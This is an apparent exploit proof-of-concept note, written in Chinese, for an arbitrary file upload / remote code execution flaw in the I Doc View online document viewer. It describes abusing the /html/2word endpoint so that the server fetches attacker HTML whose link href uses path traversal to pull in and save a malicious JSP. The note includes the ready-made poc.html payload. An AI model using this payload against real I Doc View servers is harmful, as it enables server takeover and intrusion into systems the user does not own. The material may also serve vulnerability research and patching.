POC/wpoc/iDocView/I Doc View任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

31 lines
896 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## I Doc View任意文件上传漏洞
I DOC VIEW是一个在线的文档查看器其中的/html/2word接口因为处理不当导致可以远程读取任意文件通过这个接口导致服务器下载恶意的JSP进行解析从而RCE。
## POC构造
流程携带恶意link[href]的html -> 远程获取 -> 解析出href -> 远程获取恶意文件
poc.html
```html
<!DOCTYPE html>
<html lang="en">
<head>
<title>test</title>
</head>
<body>
<link href="/..\..\..\docview\poc.jsp">
</body>
</html>
```
然后构造 `..\..\..\docview\poc.jsp` 这个是文件
![image](https://github.com/wy876/POC/assets/139549762/736f7c0a-4f06-4170-805a-cf1580b69de3)
![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)
## 漏洞分析
```
https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg
https://mp.weixin.qq.com/s/mD4EcVmJ9QPmmMLh6KrZ0g
```